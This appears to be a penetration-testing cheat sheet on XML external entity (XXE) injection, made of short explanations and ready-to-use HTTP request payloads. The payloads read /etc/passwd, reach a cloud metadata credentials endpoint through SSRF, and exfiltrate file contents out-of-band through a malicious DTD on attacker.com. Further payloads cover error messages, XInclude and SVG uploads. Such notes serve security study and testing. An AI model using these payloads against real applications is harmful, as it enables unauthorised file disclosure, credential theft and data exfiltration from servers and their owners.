The XML document type definition (DTD) contains declarations that can define the structure of an XML document. The DTD is declared within the optional DOCTYPE element at the start of the XML document.
XXE are a type of custom XML entity whose defined values are loaded from outside of the DTD.
Allows an attacker to interfere with an application's processing of XML data.
Examples
Custom entities to be defined within the DTD
<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
XML external entities
uses the "SYSTEM" keyword and must specify a URL
<!DOCTYPE foo [ <!ENTITY NAME SYSTEM "http://normal-website.com" > ]><!DOCTYPE foo [ <!ENTITY NAME SYSTEM "file:///path/to/file" > ]>
Types of XXE attacks
Exploiting XXE to retrieve files
// Edit HTTP request with "BurpSuit Proxy"
POST /web/path HTTP/1.1
Host: test.net
...
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><MainTag><VulTag>&xxe;</VulTag></MainTag>
Exploiting XXE to perform SSRF attacks
// Edit HTTP request with "BurpSuit Proxy"
POST /web/path HTTP/1.1
Host: test.net
...
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY ssrf SYSTEM "http://169.254.169.254/admin/security-credentials"> ]><MainTag><VulTag>&ssrf;</VulTag></MainTag>
Blind XXE vulnerabilities
Does not return the values of any defined external entities within its responses.
// Edit HTTP request with "BurpSuit Proxy"
// Detecting: DNS lookup and HTTP request (with Burp Collaborator client)
POST /web/path HTTP/1.1
Host: test.net
...
Connection: close
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.attacker.com"> ]>]><MainTag><VulTag>&xxe;</VulTag></MainTag>
// Edit HTTP request with "BurpSuit Proxy"
// Detecting: DNS lookup and HTTP request (with Burp Collaborator client) + XML parameter entity
POST /web/path HTTP/1.1
Host: test.net
...
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.attacker.com"> %xxe; ]>
Use the FTP protocol instead of HTTP, it will be possible to exfiltrate data containing newline character
Exploiting blind XXE exfiltrate data out-of-band
Attacker create a malicious DTD on his server (malicious.dtd) like:
// "malicious.dtd" File
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
Attacker must submit the following XXE payload to the vulnerable application:
// Edit HTTP request with "BurpSuit Proxy"
POST /web/path HTTP/1.1
Host: test.net
...
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe;]>
Use the FTP protocol instead of HTTP, it will be possible to exfiltrate data containing newline characters
Exploiting blind XXE to retrieve data via error messages
First method
Attacker create a malicious DTD on his server (malicious.dtd) like:
// "malicious.dtd" File
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
Attacker must submit the following XXE payload to the vulnerable application:
// Edit HTTP request with "BurpSuit Proxy"
POST /web/path HTTP/1.1
Host: test.net
...
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe;]>
Second method
Retrieve data via repurposing a local DTD
// Edit HTTP request with "BurpSuit Proxy"
POST /web/path HTTP/1.1
Host: test.net
...
Connection: close
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM
'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
Finding hidden attack surface for XXE injection
XInclude attacks
Some applications receive client-submitted data, embed it on the server-side into an XML document like: backend SOAP service.
"XInclude" is a part of the XML specification that allows an XML document to be built from sub-documents.
// Edit HTTP request with "BurpSuit Proxy"
POST /product/stock HTTP/1.1
Host: web-security-academy.net
...
Connection: close
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo> &storeId=1
XXE attacks via file upload
If uploaded files which are then processed server-side, it can be vulnerable. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.
Create a SVG image with this payload and upload it. The result will be on the image.
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
XXE attacks via modified content type
You might be able submit the following request, with the same result.
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
Server parses the body content as XML, then you can reach the hidden XXE attack surface
